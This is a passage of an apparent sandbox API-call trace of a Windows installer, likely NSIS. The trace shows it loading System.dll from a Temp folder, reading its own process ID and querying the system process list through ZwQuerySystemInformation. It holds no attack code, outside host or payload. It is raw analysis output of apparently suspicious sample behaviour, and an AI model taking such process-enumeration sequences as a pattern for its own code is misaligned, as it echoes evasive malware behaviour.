lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.004] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.004] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff 
[0158.004] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetCurrentProcessId()i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetCurrentProcessId()i.R0") returned="kernel32::GetCurrentProcessId()i.R0" [0158.004] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.004] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.004] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.004] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.004] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.005] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.005] lstrcpyA (in: lpString1=0x3250b8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.005] lstrcpyA (in: lpString1=0x3254c8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.005] lstrcpyA (in: lpString1=0x3258c8, lpString2="GetCurrentProcessId" | out: lpString1="GetCurrentProcessId") returned="GetCurrentProcessId" [0158.005] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0158.005] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentProcessId") returned 0x75ca11f8 [0158.005] lstrcpynA (in: lpString1=0x3250b8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.005] GetCurrentProcessId () returned 0x4c8 [0158.005] wsprintfA (in: param_1=0x3250b8, param_2="%d" 
| out: param_1="1224") returned 4 [0158.005] lstrcpyA (in: lpString1=0x432800, lpString2="1224" | out: lpString1="1224") returned="1224" [0158.005] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.005] lstrlenA (lpString="1224") returned 4 [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrlenA (lpString="1224") returned 4 [0158.006] lstrcpynA (in: lpString1=0x31441c, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x31482c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x40a418, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x31441c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x31482c, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x430000, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.006] lstrlenA (lpString="384") returned 3 [0158.006] lstrcpynA (in: lpString1=0x31482c, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x3250bc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] 
lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x3254cc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrlenA (lpString="") returned 0 [0158.006] lstrcpynA (in: lpString1=0x3258dc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.006] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrlenA (lpString="") returned 0 [0158.007] lstrcpynA (in: lpString1=0x325cec, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrlenA (lpString="") returned 0 [0158.007] lstrcpynA (in: lpString1=0x3260fc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrlenA (lpString="") returned 0 [0158.007] lstrcpynA (in: lpString1=0x32650c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.007] lstrlenA (lpString="1224") returned 4 [0158.007] lstrcpynA (in: lpString1=0x40a418, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.007] lstrlenA (lpString="1224") returned 4 [0158.007] lstrcpynA (in: lpString1=0x430400, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.007] lstrcpynA (in: lpString1=0x40a418, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.007] lstrlenA (lpString="65536") returned 5 [0158.007] lstrcpynA (in: lpString1=0x430800, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.007] lstrcpynA (in: lpString1=0x32691c, 
lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.007] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.007] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.007] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.007] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.008] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.008] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.008] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.008] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.008] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.008] GetFileAttributesA 
(lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.008] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.008] lstrcpynA (in: lpString1=0x42e3a0, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.008] lstrlenA (lpString="65536") returned 5 [0158.010] lstrcpynA (in: lpString1=0x3217a4, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.010] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.010] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.010] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.010] lstrcpynA (in: lpString1=0x40a418, lpString2="Alloc", iMaxLength=1024 | out: lpString1="Alloc") returned="Alloc" [0158.011] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.011] GetProcAddress (hModule=0x75710000, lpProcName="Alloc") returned 0x75711000 [0158.012] wsprintfA (in: param_1=0x18f5a4, param_2="%d" | out: param_1="3304744") returned 7 [0158.012] lstrcpynA (in: lpString1=0x336d34, 
lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.012] lstrcpynA (in: lpString1=0x430c00, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.012] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.012] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.012] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.012] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.012] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.012] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.012] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.012] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.012] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.013] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.013] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.013] lstrcpynA (in: lpString1=0x42e3c7, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.013] lstrlenA (lpString="3304744") returned 7 [0158.013] lstrcpynA (in: lpString1=0x42e3d2, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.013] lstrlenA (lpString="65536") returned 5 [0158.013] lstrcpynA (in: lpString1=0x336d34, lpString2="ntdll::ZwQuerySystemInformation(i 5, i 3304744, i 65536, i 0) i .r0", iMaxLength=1024 | out: lpString1="ntdll::ZwQuerySystemInformation(i 5, i 3304744, i 65536, i 0) i .r0") returned="ntdll::ZwQuerySystemInformation(i 5, i 3304744, i 65536, i 0) i .r0" [0158.013] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.013] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.013] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.013] 
lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.014] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.014] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.014] lstrcpyA (in: lpString1=0x337548, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.014] lstrcpyA (in: lpString1=0x3217a8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.014] lstrcpyA (in: lpString1=0x321ba8, lpString2="ZwQuerySystemInformation" | out: lpString1="ZwQuerySystemInformation") returned="ZwQuerySystemInformation" [0158.014] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0158.015] GetProcAddress (hModule=0x77d30000, lpProcName="ZwQuerySystemInformation") returned 0x77d4fda0 [0158.015] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="65536") returned 5 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3304744") returned 7 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="5") returned 1 [0158.016] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.016] lstrcpyA (in: lpString1=0x430000, lpString2="0" | out: lpString1="0") returned="0" [0158.016] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.016] lstrlenA (lpString="0") returned 1 [0158.016] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.016] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.016] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0158.016] lstrcpynA 
(in: lpString1=0x42e3a0, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.016] lstrlenA (lpString="3304744") returned 7 [0158.016] lstrcpynA (in: lpString1=0x40a418, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.016] lstrlenA (lpString="3304744") returned 7 [0158.016] lstrcpynA (in: lpString1=0x431c00, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.016] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.017] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.017] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.017] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.017] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.017] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.017] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.017] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.017] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.017] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0158.017] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0158.017] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.018] lstrlenA (lpString="3304744") returned 7 [0158.018] lstrcpynA (in: lpString1=0x336d34, lpString2="*3304744(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)", iMaxLength=1024 | out: lpString1="*3304744(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)") returned="*3304744(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)" [0158.018] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.018] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.018] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.018] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.018] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.018] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.018] lstrcpyA (in: lpString1=0x321ba8, lpString2="3304744" | out: lpString1="3304744") returned="3304744" [0158.018] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.018] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.019] lstrcpynA (in: lpString1=0x336d30, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] lstrcpyA (in: lpString1=0x431800, lpString2="0" | out: lpString1="0") returned="0" [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] lstrcpyA (in: lpString1=0x430800, lpString2="0" | out: lpString1="0") returned="0" [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.019] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="0") returned 1 [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="248") returned 3 [0158.020] lstrcpyA (in: lpString1=0x431000, lpString2="248" | out: lpString1="248") returned="248" [0158.020] wsprintfA (in: param_1=0x336d30, param_2="%d" | out: param_1="3304744") returned 7 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1224", iMaxLength=1024 | out: lpString1="1224") returned="1224" [0158.020] lstrlenA (lpString="1224") returned 4 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.020] lstrlenA (lpString="0") returned 1 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.020] lstrlenA (lpString="248") returned 3 [0158.020] lstrcpynA (in: lpString1=0x40ac18, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" 
[0158.020] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.020] lstrcmpiA (lpString1="248", lpString2="0") returned 1 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3304744", iMaxLength=1024 | out: lpString1="3304744") returned="3304744" [0158.020] lstrlenA (lpString="3304744") returned 7 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="248", iMaxLength=1024 | out: lpString1="248") returned="248" [0158.020] lstrlenA (lpString="248") returned 3 [0158.020] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3304992") returned 7 [0158.020] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.020] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0158.020] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.020] lstrcpynA (in: 